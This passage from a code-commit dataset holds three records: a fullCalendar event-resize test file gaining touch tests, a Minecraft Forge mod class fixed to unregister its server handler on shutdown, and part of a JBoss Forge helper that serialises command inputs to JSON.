non-jqui dummy object expect(typeof view).toBe('object'); resizeDoneFunc.apply(this, arguments); }; spyOn(options, 'eventResizeStart').and.callThrough(); spyOn(options, 'eventResizeStop').and.callThrough(); setTimeout(function() { // hack. agenda view scroll state would get messed up between tests $('#cal').fullCalendar(options); }, 0); } });
tests/automated/event-resize.js
describe('eventResize', function() { var options; beforeEach(function() { options = { defaultDate: '2014-06-11', editable: true }; affix('#cal'); }); afterEach(function() { $('#cal').fullCalendar('destroy'); }); describe('when in month view', function() { beforeEach(function() { options.defaultView = 'month'; }); describe('when resizing an all-day event', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left dy: $('.fc-day').height() }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(5); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-17'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when rendering a timed event', function() { it('should not have resize capabilities', function(done) { options.events = [ { title: 'timed event', start: '2014-06-11T08:00:00', allDay: false } ]; options.eventAfterAllRender = function() { expect($('.fc-event .fc-resizer').length).toBe(0); done(); }; $('#cal').fullCalendar(options); }); }); }); describe('when in agenda view', function() { beforeEach(function() { options.defaultView = 'agendaWeek'; }); describe('when resizing an all-day event', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('th.fc-wed').width() * 1.5 // two days }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(2); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-14'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when resizing a timed event with an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', end: '2014-06-11T07:00:00', allDay: false } ]; }); it('should have correct arguments with a timed delta', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); // TODO: test RTL it('should have correct arguments with a timed delta when resized to a different day', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day-header:first').width() * .9, // one day dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, 
revertFunc) { expect(delta.days()).toBe(1); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-12T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is local', function(done) { options.timezone = 'local'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); // compate to local moment expect(event.end).toEqualMoment(moment('2014-06-11T09:30:00')); revertFunc(); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); expect(event.end).toEqualMoment(moment('2014-06-11T07:00:00')); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is UTC', function(done) { options.timezone = 'UTC'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00+00:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00+00:00'); done(); } ); }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00 - 7:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should run the temporarily rendered event through eventRender', function(done) { options.eventRender = function(event, element) { element.addClass('didEventRender'); }; options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).toHaveClass('didEventRender'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should not fire the windowResize handler', function(done) { // bug 1116 // has to do this crap because PhantomJS was trigger false window resizes unrelated to the 
fc-event resize var alreadyRendered = false; var isDragging = false; var calledWhileDragging = false; options.windowResizeDelay = 0; options.windowResize = function(ev) { if (isDragging) { calledWhileDragging = true; } }; options.eventAfterAllRender = function() { if (alreadyRendered) { return; } alreadyRendered = true; setTimeout(function() { isDragging = true; $('.fc-event .fc-resizer').simulate('drag', { dy: 100, onBeforeRelease: function() { isDragging = false; }, onRelease: function() { expect(calledWhileDragging).toBe(false); done(); } }); }, 100); // hack for PhantomJS. after any initial false window resizes }; $('#cal').fullCalendar(options); }); }); describe('when resizing a timed event without an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', allDay: false } ]; }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); }); }); // Initialize a calendar, run a resize, and do type-checking of all arguments for all handlers. // TODO: more descrimination instead of just checking for 'object' function init(resizeStartFunc, resizeDoneFunc) { var eventsRendered = false; options.eventAfterAllRender = function() { if (!eventsRendered) { // because event rerendering will happen when resize is over resizeStartFunc(); eventsRendered = true; } }; options.eventResizeStart = function(event, jsEvent, uiEvent, view) { expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResizeStop = function(event, jsEvent, uiEvent, view) { expect(options.eventResizeStart).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResize = function(event, delta, revertFunc, jsEvent, uiEvent, view) { expect(options.eventResizeStop).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(moment.isDuration(delta)).toBe(true); expect(typeof revertFunc).toBe('function'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); // might be a non-jqui dummy object expect(typeof view).toBe('object'); resizeDoneFunc.apply(this, arguments); }; spyOn(options, 'eventResizeStart').and.callThrough(); spyOn(options, 'eventResizeStop').and.callThrough(); setTimeout(function() { // hack. agenda view scroll state would get messed up between tests $('#cal').fullCalendar(options); }, 0); } });
tests: month view event resizing for touch
tests/automated/event-resize.js
tests: month view event resizing for touch
<ide><path>ests/automated/event-resize.js <ide> options.defaultView = 'month'; <ide> }); <ide> <del> describe('when resizing an all-day event', function() { <add> describe('when resizing an all-day event with mouse', function() { <ide> it('should have correct arguments with a whole-day delta', function(done) { <ide> options.events = [ { <ide> title: 'all-day event', <ide> $('.fc-event .fc-resizer').simulate('drag', { <ide> dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left <ide> dy: $('.fc-day').height() <add> }); <add> }, <add> function(event, delta, revertFunc) { <add> expect(delta.asDays()).toBe(5); <add> expect(delta.hours()).toBe(0); <add> expect(delta.minutes()).toBe(0); <add> expect(delta.seconds()).toBe(0); <add> expect(delta.milliseconds()).toBe(0); <add> <add> expect(event.start).toEqualMoment('2014-06-11'); <add> expect(event.end).toEqualMoment('2014-06-17'); <add> revertFunc(); <add> expect(event.start).toEqualMoment('2014-06-11'); <add> expect(event.end).toBeNull(); <add> <add> done(); <add> } <add> ); <add> }); <add> }); <add> <add> describe('when resizing an all-day event via touch', function() { <add> <add> it('should have correct arguments with a whole-day delta', function(done) { <add> options.isTouch = true; <add> options.longPressDelay = 100; <add> options.dragRevertDuration = 0; // so that eventDragStop happens immediately after touchend <add> options.events = [ { <add> title: 'all-day event', <add> start: '2014-06-11', <add> allDay: true <add> } ]; <add> <add> init( <add> function() { <add> $('.fc-event').simulate('drag', { <add> isTouch: true, <add> delay: 200, <add> onRelease: function() { <add> $('.fc-event .fc-resizer').simulate('drag', { <add> dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left <add> dy: $('.fc-day').height(), <add> isTouch: true <add> }); <add> } <ide> }); <ide> }, <ide> function(event, delta, revertFunc) {
Java
mit
15dd0f369187d697d0d14c73650778876385e117
0
Vlaeh/Minecraft.PlayersInBed
package vlaeh.minecraft.forge.playersinbed; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import net.minecraftforge.common.MinecraftForge; import net.minecraftforge.eventbus.api.SubscribeEvent; import net.minecraftforge.fml.ModLoadingContext; import net.minecraftforge.fml.client.event.ConfigChangedEvent; import net.minecraftforge.fml.common.Mod; import net.minecraftforge.fml.config.ModConfig; import net.minecraftforge.fml.event.server.FMLServerStartedEvent; import net.minecraftforge.fml.event.server.FMLServerStartingEvent; import net.minecraftforge.fml.event.server.FMLServerStoppedEvent; import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext; import vlaeh.minecraft.forge.playersinbed.server.I18nLanguageHook; @Mod(PlayersInBed.MODID) //TODO 1.13 guiFactory = "vlaeh.minecraft.forge.playersinbed.PlayersInBedGUIFactory") public class PlayersInBed { public static final String MODID = "playersinbed"; public static final Logger LOGGER = LogManager.getLogger(); public static I18nLanguageHook i18n = new I18nLanguageHook().loadLanguage(MODID, "en_us"); private PlayersInBedServerSide serverSide = null; public PlayersInBed() { LOGGER.debug("Creating Player In Bed mod"); ModLoadingContext.get().registerConfig(ModConfig.Type.SERVER, PlayersInBedConfig.serverSpec); FMLJavaModLoadingContext.get().getModEventBus().register(this); MinecraftForge.EVENT_BUS.register(this); } @SubscribeEvent public void serverStarting(final FMLServerStartingEvent event) { LOGGER.info("Server starting"); PlayersInBedServerCommand.registerAll(event.getCommandDispatcher()); } @SubscribeEvent public void serverStarted(final FMLServerStartedEvent event) { LOGGER.info("Server started"); serverSide = new PlayersInBedServerSide(); MinecraftForge.EVENT_BUS.register(serverSide); } @SubscribeEvent public void serverStopped(final FMLServerStoppedEvent event) { LOGGER.info("Server stopped"); MinecraftForge.EVENT_BUS.unregister(serverSide); } @SubscribeEvent public void onConfigChanged(final ConfigChangedEvent.OnConfigChangedEvent event) { LOGGER.info("Config changed {}" + event); } @SubscribeEvent public void onLoad(final ModConfig.Loading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Loading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } @SubscribeEvent public void onFileChange(final ModConfig.ConfigReloading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Reloading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } }
src/main/java/vlaeh/minecraft/forge/playersinbed/PlayersInBed.java
package vlaeh.minecraft.forge.playersinbed; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import net.minecraftforge.common.MinecraftForge; import net.minecraftforge.eventbus.api.SubscribeEvent; import net.minecraftforge.fml.ModLoadingContext; import net.minecraftforge.fml.client.event.ConfigChangedEvent; import net.minecraftforge.fml.common.Mod; import net.minecraftforge.fml.config.ModConfig; import net.minecraftforge.fml.event.server.FMLServerStartedEvent; import net.minecraftforge.fml.event.server.FMLServerStartingEvent; import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext; import vlaeh.minecraft.forge.playersinbed.server.I18nLanguageHook; @Mod(PlayersInBed.MODID) //TODO 1.13 guiFactory = "vlaeh.minecraft.forge.playersinbed.PlayersInBedGUIFactory") public class PlayersInBed { public static final String MODID = "playersinbed"; public static final Logger LOGGER = LogManager.getLogger(); public static I18nLanguageHook i18n = new I18nLanguageHook().loadLanguage(MODID, "en_us"); public PlayersInBed() { LOGGER.debug("Creating Player In Bed mod"); ModLoadingContext.get().registerConfig(ModConfig.Type.SERVER, PlayersInBedConfig.serverSpec); FMLJavaModLoadingContext.get().getModEventBus().register(this); MinecraftForge.EVENT_BUS.register(this); } @SubscribeEvent public void serverStarting(FMLServerStartingEvent event) { LOGGER.info("Server starting"); PlayersInBedServerCommand.registerAll(event.getCommandDispatcher()); } @SubscribeEvent public void serverStarted(final FMLServerStartedEvent event) { LOGGER.info("Server started"); MinecraftForge.EVENT_BUS.register(new PlayersInBedServerSide()); } @SubscribeEvent public void onConfigChanged(final ConfigChangedEvent.OnConfigChangedEvent event) { LOGGER.info("Config changed {}" + event); } @SubscribeEvent public void onLoad(final ModConfig.Loading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Loading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } @SubscribeEvent public void onFileChange(final ModConfig.ConfigReloading configEvent) { final ModConfig config = configEvent.getConfig(); LOGGER.info("Reloading configuration {}", config); PlayersInBedConfig.instance.load(config.getConfigData()); } }
Avoid registering multiple instances when restarting local game
src/main/java/vlaeh/minecraft/forge/playersinbed/PlayersInBed.java
Avoid registering multiple instances when restarting local game
<ide><path>rc/main/java/vlaeh/minecraft/forge/playersinbed/PlayersInBed.java <ide> import net.minecraftforge.fml.config.ModConfig; <ide> import net.minecraftforge.fml.event.server.FMLServerStartedEvent; <ide> import net.minecraftforge.fml.event.server.FMLServerStartingEvent; <add>import net.minecraftforge.fml.event.server.FMLServerStoppedEvent; <ide> import net.minecraftforge.fml.javafmlmod.FMLJavaModLoadingContext; <ide> import vlaeh.minecraft.forge.playersinbed.server.I18nLanguageHook; <ide> <ide> public static final Logger LOGGER = LogManager.getLogger(); <ide> public static I18nLanguageHook i18n = new I18nLanguageHook().loadLanguage(MODID, "en_us"); <ide> <add> private PlayersInBedServerSide serverSide = null; <add> <ide> public PlayersInBed() { <ide> LOGGER.debug("Creating Player In Bed mod"); <ide> ModLoadingContext.get().registerConfig(ModConfig.Type.SERVER, PlayersInBedConfig.serverSpec); <ide> } <ide> <ide> @SubscribeEvent <del> public void serverStarting(FMLServerStartingEvent event) { <add> public void serverStarting(final FMLServerStartingEvent event) { <ide> LOGGER.info("Server starting"); <ide> PlayersInBedServerCommand.registerAll(event.getCommandDispatcher()); <ide> } <ide> @SubscribeEvent <ide> public void serverStarted(final FMLServerStartedEvent event) { <ide> LOGGER.info("Server started"); <del> MinecraftForge.EVENT_BUS.register(new PlayersInBedServerSide()); <add> serverSide = new PlayersInBedServerSide(); <add> MinecraftForge.EVENT_BUS.register(serverSide); <ide> } <add> <add> @SubscribeEvent <add> public void serverStopped(final FMLServerStoppedEvent event) { <add> LOGGER.info("Server stopped"); <add> MinecraftForge.EVENT_BUS.unregister(serverSide); <add> } <add> <ide> <ide> @SubscribeEvent <ide> public void onConfigChanged(final ConfigChangedEvent.OnConfigChangedEvent event) {
Java
epl-1.0
a83e8cbefaa3d89c67210809a7fe6a1cb0e64708
0
forge/forge-service,forge/forge-service,forge/forge-service
/* * Copyright 2015 Red Hat, Inc. and/or its affiliates. * * Licensed under the Eclipse Public License version 1.0, available at * http://www.eclipse.org/legal/epl-v10.html */ package org.jboss.forge.service.util; import static javax.json.Json.createArrayBuilder; import static javax.json.Json.createObjectBuilder; import java.beans.BeanInfo; import java.beans.IntrospectionException; import java.beans.Introspector; import java.beans.PropertyDescriptor; import java.lang.reflect.Method; import java.util.ArrayList; import javax.inject.Inject; import javax.json.JsonArray; import javax.json.JsonArrayBuilder; import javax.json.JsonNumber; import javax.json.JsonObject; import javax.json.JsonObjectBuilder; import javax.json.JsonString; import javax.json.JsonValue; import javax.json.JsonValue.ValueType; import org.jboss.forge.addon.convert.Converter; import org.jboss.forge.addon.convert.ConverterFactory; import org.jboss.forge.addon.ui.controller.CommandController; import org.jboss.forge.addon.ui.controller.WizardCommandController; import org.jboss.forge.addon.ui.input.HasCompleter; import org.jboss.forge.addon.ui.input.InputComponent; import org.jboss.forge.addon.ui.input.ManyValued; import org.jboss.forge.addon.ui.input.SelectComponent; import org.jboss.forge.addon.ui.input.SingleValued; import org.jboss.forge.addon.ui.input.UICompleter; import org.jboss.forge.addon.ui.input.UIInput; import org.jboss.forge.addon.ui.input.UIInputMany; import org.jboss.forge.addon.ui.input.UISelectMany; import org.jboss.forge.addon.ui.input.UISelectOne; import org.jboss.forge.addon.ui.metadata.UICommandMetadata; import org.jboss.forge.addon.ui.output.UIMessage; import org.jboss.forge.addon.ui.result.CompositeResult; import org.jboss.forge.addon.ui.result.Failed; import org.jboss.forge.addon.ui.result.Result; import org.jboss.forge.addon.ui.util.InputComponents; import org.jboss.forge.furnace.proxy.Proxies; import org.jboss.forge.service.ui.RestUIProvider; /** * Describes commands * * @author <a href="mailto:[email protected]">George Gastaldi</a> */ public class UICommandHelper { private final ConverterFactory converterFactory; @Inject public UICommandHelper(ConverterFactory converterFactory) { this.converterFactory = converterFactory; } public void describeController(JsonObjectBuilder builder, CommandController controller) { describeMetadata(builder, controller); describeCurrentState(builder, controller); describeInputs(builder, controller); } public void describeCurrentState(JsonObjectBuilder builder, CommandController controller) { JsonObjectBuilder stateBuilder = createObjectBuilder(); stateBuilder.add("valid", controller.isValid()); stateBuilder.add("canExecute", controller.canExecute()); if (controller instanceof WizardCommandController) { stateBuilder.add("wizard", true); stateBuilder.add("canMoveToNextStep", ((WizardCommandController) controller).canMoveToNextStep()); stateBuilder.add("canMoveToPreviousStep", ((WizardCommandController) controller).canMoveToPreviousStep()); } else { stateBuilder.add("wizard", false); } builder.add("state", stateBuilder); } public void describeMetadata(JsonObjectBuilder builder, CommandController controller) { UICommandMetadata metadata = controller.getMetadata(); JsonObjectBuilder metadataBuilder = createObjectBuilder(); metadataBuilder.add("deprecated", metadata.isDeprecated()); addOptional(metadataBuilder, "category", metadata.getCategory()); addOptional(metadataBuilder, "name", metadata.getName()); addOptional(metadataBuilder, "description", metadata.getDescription()); 
addOptional(metadataBuilder, "deprecatedMessage", metadata.getDeprecatedMessage()); builder.add("metadata", metadataBuilder); } @SuppressWarnings("unchecked") public void describeInputs(JsonObjectBuilder builder, CommandController controller) { // Add inputs JsonArrayBuilder inputBuilder = createArrayBuilder(); for (InputComponent<?, ?> input : controller.getInputs().values()) { JsonObjectBuilder objBuilder = createObjectBuilder() .add("name", input.getName()) .add("shortName", String.valueOf(input.getShortName())) .add("valueType", input.getValueType().getName()) .add("inputType", InputComponents.getInputType(input)) .add("enabled", input.isEnabled()) .add("required", input.isRequired()) .add("deprecated", input.isDeprecated()) .add("label", InputComponents.getLabelFor(input, false)); addOptional(objBuilder, "description", input.getDescription()); addOptional(objBuilder, "note", input.getNote()); Converter<Object, String> inputConverter = null; if (input instanceof SelectComponent) { SelectComponent<?, Object> selectComponent = (SelectComponent<?, Object>) input; inputConverter = InputComponents.getItemLabelConverter(converterFactory, selectComponent); JsonArrayBuilder valueChoices = createArrayBuilder(); for (Object valueChoice : selectComponent.getValueChoices()) { Object itemUnwrapped = Proxies.unwrap(valueChoice); String label = inputConverter.convert(itemUnwrapped); valueChoices.add(describeValueChoice(label, itemUnwrapped)); } objBuilder.add("valueChoices", valueChoices); if (input instanceof UISelectMany) { objBuilder.add("class", UISelectMany.class.getSimpleName()); } else { objBuilder.add("class", UISelectOne.class.getSimpleName()); } } else { if (input instanceof UIInputMany) { objBuilder.add("class", UIInputMany.class.getSimpleName()); } else { objBuilder.add("class", UIInput.class.getSimpleName()); } } if (inputConverter == null) { inputConverter = (Converter<Object, String>) converterFactory .getConverter(input.getValueType(), String.class); } if (input instanceof ManyValued) { ManyValued<?, Object> many = (ManyValued<?, Object>) input; JsonArrayBuilder manyValues = createArrayBuilder(); for (Object item : many.getValue()) { manyValues.add(inputConverter.convert(Proxies.unwrap(item))); } objBuilder.add("value", manyValues); } else { SingleValued<?, Object> single = (SingleValued<?, Object>) input; Object value = single.getValue(); if (value != null && !(value instanceof Number) && !(value instanceof Boolean)) { value = inputConverter.convert(Proxies.unwrap(value)); } addOptional(objBuilder, "value", value); } if (input instanceof HasCompleter) { HasCompleter<?, Object> hasCompleter = (HasCompleter<?, Object>) input; UICompleter<Object> completer = hasCompleter.getCompleter(); if (completer != null) { JsonArrayBuilder typeAheadData = createArrayBuilder(); Iterable<Object> valueChoices = completer.getCompletionProposals(controller.getContext(), (InputComponent<?, Object>) input, ""); for (Object valueChoice : valueChoices) { typeAheadData.add(inputConverter.convert(Proxies.unwrap(valueChoice))); } objBuilder.add("typeAheadData", typeAheadData); } } inputBuilder.add(objBuilder); } builder.add("inputs", inputBuilder); } public void describeValidation(JsonObjectBuilder builder, CommandController controller) { // Add messages JsonArrayBuilder messages = createArrayBuilder(); for (UIMessage message : controller.validate()) { JsonObjectBuilder messageObj = createObjectBuilder() .add("description", message.getDescription()) .add("severity", message.getSeverity().name()); if 
(message.getSource() != null) messageObj.add("input", message.getSource().getName()); messages.add(messageObj); } builder.add("messages", messages); } public void describeExecution(JsonObjectBuilder builder, CommandController controller) throws Exception { Result result = controller.execute(); describeResult(builder, result); // Get out and err RestUIProvider provider = (RestUIProvider) controller.getContext().getProvider(); builder.add("out", provider.getOut()); builder.add("err", provider.getErr()); } public void populateControllerAllInputs(JsonObject content, CommandController controller) throws Exception { populateController(content, controller); int stepIndex = content.getInt("stepIndex", 0); if (controller instanceof WizardCommandController) { WizardCommandController wizardController = (WizardCommandController) controller; for (int i = 0; i < stepIndex && wizardController.canMoveToNextStep(); i++) { wizardController.next().initialize(); populateController(content, wizardController); } } } public void populateController(JsonObject content, CommandController controller) { JsonArray inputArray = content.getJsonArray("inputs"); for (int i = 0; i < inputArray.size(); i++) { JsonObject input = inputArray.getJsonObject(i); String inputName = input.getString("name"); JsonValue valueObj = input.get("value"); Object inputValue = null; if (valueObj != null) { switch (valueObj.getValueType()) { case ARRAY: ArrayList<String> list = new ArrayList<>(); for (JsonValue value : (JsonArray) valueObj) { if (value.getValueType() == ValueType.STRING) { list.add(((JsonString) value).getString()); } } inputValue = list; break; case FALSE: inputValue = false; break; case TRUE: inputValue = true; break; case NUMBER: inputValue = ((JsonNumber) valueObj).intValue(); break; case STRING: inputValue = ((JsonString) valueObj).getString(); break; default: break; } } if (controller.hasInput(inputName) && inputValue != null) controller.setValueFor(inputName, inputValue); } } public void describeResult(JsonObjectBuilder builder, Result result) { JsonArrayBuilder array = createArrayBuilder(); collectResults(array, result); builder.add("results", array); } protected void collectResults(JsonArrayBuilder results, Result result) { if (result instanceof CompositeResult) { for (Result r : ((CompositeResult) result).getResults()) { collectResults(results, r); } } else { results.add(describeSingleResult(result)); } } protected JsonObjectBuilder describeValueChoice(String label, Object obj) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("id", label); if (!(obj instanceof String) && !(obj instanceof Number) && !(obj instanceof Boolean)) { try { BeanInfo beanInfo = Introspector.getBeanInfo(obj.getClass()); for (PropertyDescriptor pd : beanInfo.getPropertyDescriptors()) { // Ignore class attribute from Object.class and do not override id String name = pd.getName(); if ("id".equals(name) || "class".equals(name)) { continue; } Method readMethod = pd.getReadMethod(); if (readMethod != null) { try { addOptional(builder, name, readMethod.invoke(obj)); } catch (Exception e) { // Ignore // e.printStackTrace(); } } } } catch (IntrospectionException ie) { // ignore // ie.printStackTrace(); } } return builder; } protected JsonObjectBuilder describeSingleResult(Result result) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("status", (result instanceof Failed) ? 
"FAILED" : "SUCCESS"); if (result != null) addOptional(builder, "message", result.getMessage()); return builder; } protected void addOptional(JsonObjectBuilder builder, String name, Object value) { if (value != null) { if (value instanceof Boolean) { builder.add(name, (Boolean) value); } else if (value instanceof Number) { builder.add(name, ((Number) value).intValue()); } else { builder.add(name, value.toString()); } } } }
core/src/main/java/org/jboss/forge/service/util/UICommandHelper.java
/* * Copyright 2015 Red Hat, Inc. and/or its affiliates. * * Licensed under the Eclipse Public License version 1.0, available at * http://www.eclipse.org/legal/epl-v10.html */ package org.jboss.forge.service.util; import static javax.json.Json.createArrayBuilder; import static javax.json.Json.createObjectBuilder; import java.beans.BeanInfo; import java.beans.IntrospectionException; import java.beans.Introspector; import java.beans.PropertyDescriptor; import java.lang.reflect.Method; import java.util.ArrayList; import javax.inject.Inject; import javax.json.JsonArray; import javax.json.JsonArrayBuilder; import javax.json.JsonNumber; import javax.json.JsonObject; import javax.json.JsonObjectBuilder; import javax.json.JsonString; import javax.json.JsonValue; import javax.json.JsonValue.ValueType; import org.jboss.forge.addon.convert.Converter; import org.jboss.forge.addon.convert.ConverterFactory; import org.jboss.forge.addon.ui.controller.CommandController; import org.jboss.forge.addon.ui.controller.WizardCommandController; import org.jboss.forge.addon.ui.input.HasCompleter; import org.jboss.forge.addon.ui.input.InputComponent; import org.jboss.forge.addon.ui.input.ManyValued; import org.jboss.forge.addon.ui.input.SelectComponent; import org.jboss.forge.addon.ui.input.SingleValued; import org.jboss.forge.addon.ui.input.UICompleter; import org.jboss.forge.addon.ui.input.UIInput; import org.jboss.forge.addon.ui.input.UIInputMany; import org.jboss.forge.addon.ui.input.UISelectMany; import org.jboss.forge.addon.ui.input.UISelectOne; import org.jboss.forge.addon.ui.metadata.UICommandMetadata; import org.jboss.forge.addon.ui.output.UIMessage; import org.jboss.forge.addon.ui.result.CompositeResult; import org.jboss.forge.addon.ui.result.Failed; import org.jboss.forge.addon.ui.result.Result; import org.jboss.forge.addon.ui.util.InputComponents; import org.jboss.forge.furnace.proxy.Proxies; import org.jboss.forge.service.ui.RestUIProvider; /** * Describes commands * * @author <a href="mailto:[email protected]">George Gastaldi</a> */ public class UICommandHelper { private final ConverterFactory converterFactory; @Inject public UICommandHelper(ConverterFactory converterFactory) { this.converterFactory = converterFactory; } public void describeController(JsonObjectBuilder builder, CommandController controller) { describeMetadata(builder, controller); describeCurrentState(builder, controller); describeInputs(builder, controller); } public void describeCurrentState(JsonObjectBuilder builder, CommandController controller) { JsonObjectBuilder stateBuilder = createObjectBuilder(); stateBuilder.add("valid", controller.isValid()); stateBuilder.add("canExecute", controller.canExecute()); if (controller instanceof WizardCommandController) { stateBuilder.add("wizard", true); stateBuilder.add("canMoveToNextStep", ((WizardCommandController) controller).canMoveToNextStep()); stateBuilder.add("canMoveToPreviousStep", ((WizardCommandController) controller).canMoveToPreviousStep()); } else { stateBuilder.add("wizard", false); } builder.add("state", stateBuilder); } public void describeMetadata(JsonObjectBuilder builder, CommandController controller) { UICommandMetadata metadata = controller.getMetadata(); JsonObjectBuilder metadataBuilder = createObjectBuilder(); metadataBuilder.add("deprecated", metadata.isDeprecated()); addOptional(metadataBuilder, "category", metadata.getCategory()); addOptional(metadataBuilder, "name", metadata.getName()); addOptional(metadataBuilder, "description", metadata.getDescription()); 
